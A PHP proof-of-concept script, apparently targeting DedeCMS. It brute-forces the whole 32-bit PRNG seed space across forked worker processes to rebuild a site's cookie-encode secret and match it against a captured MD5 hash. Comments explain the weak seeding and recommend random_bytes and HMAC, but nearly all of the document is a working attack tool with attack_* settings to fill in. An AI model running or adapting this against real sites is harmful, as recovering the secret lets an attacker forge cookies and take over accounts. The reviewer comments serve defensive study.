dede_funcookie.php
<?php
// Wall-clock start, reported again as elapsed time once all workers finish.
$t1 = microtime(true);
echo "开始时间: $t1\n";

// ---- Settings to fill in before running ----
$cpu = 8;           // CPU core count; one worker process is forked per unit, so keep it modest
$attack_method = 2; // comparison type: 1 = user home page value, 2 = custom form value
$attack_param = ""; // data fed into the hash: the uid for type 1, dede_fields for type 2
$attack_hash = "";  // the hash value the generated candidates are compared with

// The whole seed space (0 .. 2^32) is cut into $cpu equally sized slices.
// A secret derived from a seed this small has at most that many possible
// values, which is why secrets should be generated with random_bytes().
$max_ = 4294967296;
$the_1 = (int)($max_ / $cpu); // slice width
$the_2 = $max_ % $cpu;        // remainder of the split; computed but not used below
$targets_ = [];
$slice = 0;
while ($slice < $cpu) {
    // Each entry is [first seed, last seed]; neighbouring slices share a boundary value.
    $targets_[] = [$slice * $the_1, ($slice + 1) * $the_1];
    $slice++;
}

// Alphabet the candidate strings are drawn from; the_poc() reads both via `global`.
$chars = 'abcdefghigklmnopqrstuvwxwyABCDEFGHIGKLMNOPQRSTUVWXWY0123456789';
$max = 61; // strlen($chars) - 1;
$already_test = 0; // assigned but not referenced again in this script

// Fork one worker per slice. The parent only keeps forking; each child
// processes its own slice and exits without returning to this loop.
for ($worker = 0; $worker < $cpu; $worker++) {
    $pid = pcntl_fork();
    if ($pid == -1) {
        die("could not fork");
    }
    if (!$pid) {
        // Child process: pcntl_fork() returned 0.
        the_poc($targets_[$worker][0], $targets_[$worker][1], $worker);
        exit;
    }
}
/**
 * Walk every seed in [$start, $end] and compare the string that seed
 * generates against the configured hash.
 *
 * For each seed the PRNG is re-seeded, a length between 28 and 32 is drawn,
 * a string of that length is built from $chars, and an MD5 over that string
 * combined with $attack_param is compared with $attack_hash. A match is
 * printed together with the seed that produced it.
 *
 * Reviewer's reading from the defensive side: a value generated this way has
 * no more possible values than its seed has (the script splits 0..4294967296
 * across workers), whatever its length. Secrets should come from
 * random_bytes()/random_int(), and values derived from them should use
 * hash_hmac() and be checked with hash_equals() instead of a bare md5()
 * concatenation.
 *
 * @param int $start first seed to test (inclusive)
 * @param int $end   last seed to test (inclusive; the loop condition is <=)
 * @param int $id    worker index, used only to label the progress output
 * @return void
 */
function the_poc($start,$end,$id){
// Settings and alphabet are defined at script level and shared via `global`.
global $chars;
global $max;
global $attack_method;
global $attack_param;
global $attack_hash;
// Size of this range in units of one million seeds, shown as the progress total.
$the_whole = (int)(($end-$start)/1000000);
$i_do = 0;
for($y = $start; $y<= $end; $y++) {
// Progress line once per million iterations (whenever the counter is 1 mod 1000000).
if (($i_do%1000000) == 1){
echo "$id 已完成(x1000000): ";
echo (int)($i_do/1000000);
echo "/$the_whole\n";
}
$i_do = $i_do + 1;
// The length is drawn right after seeding with the candidate value...
srand($y);
$length = rand(28,32);
// ...and the generator is seeded again with the same value before the
// characters are drawn. The order of these calls determines the resulting
// string, so it must not be rearranged.
mt_srand($y);
$rnd_cookieEncode='';
for($i = 0; $i < $length; $i++) {
$rnd_cookieEncode .= $chars[mt_rand(0, $max)];
}
if ($attack_method==1){
// Type 1: first 16 hex characters of md5(candidate . param); stops at the first match.
// NOTE(review): `==` on digest strings is a loose comparison; `===` would avoid numeric-string coercion.
if (substr(md5($rnd_cookieEncode.$attack_param),0,16) == $attack_hash){
echo "here!!!!\n";
echo $rnd_cookieEncode;
echo "\n";
echo $y;
echo "\n";
break;
}
}else{
// Type 2: full md5(param . candidate). There is no break here, so the loop
// keeps going through the rest of the range after a match.
if (md5($attack_param.$rnd_cookieEncode) == $attack_hash){
echo "here!!!!\n";
echo $rnd_cookieEncode;
echo "\n";
echo $y;
echo "\n";
}
}
}
}
// Wait for the child processes to finish. Only the parent gets here,
// because every child calls exit after its slice.
while (true) {
    if (pcntl_waitpid(0, $status) == -1) {
        // -1 is the signal used here to stop waiting.
        break;
    }
    // The raw wait status is replaced by the child's exit code, which is
    // what the message below prints (not the child's pid).
    $status = pcntl_wexitstatus($status);
    $pid = posix_getpid(); // the parent's own pid; assigned but not used
    echo "Child $status completed\n";
}

// Elapsed wall-clock time since the start of the script.
$t2 = microtime(true) - $t1;
echo "总计用时: $t2\n";
?>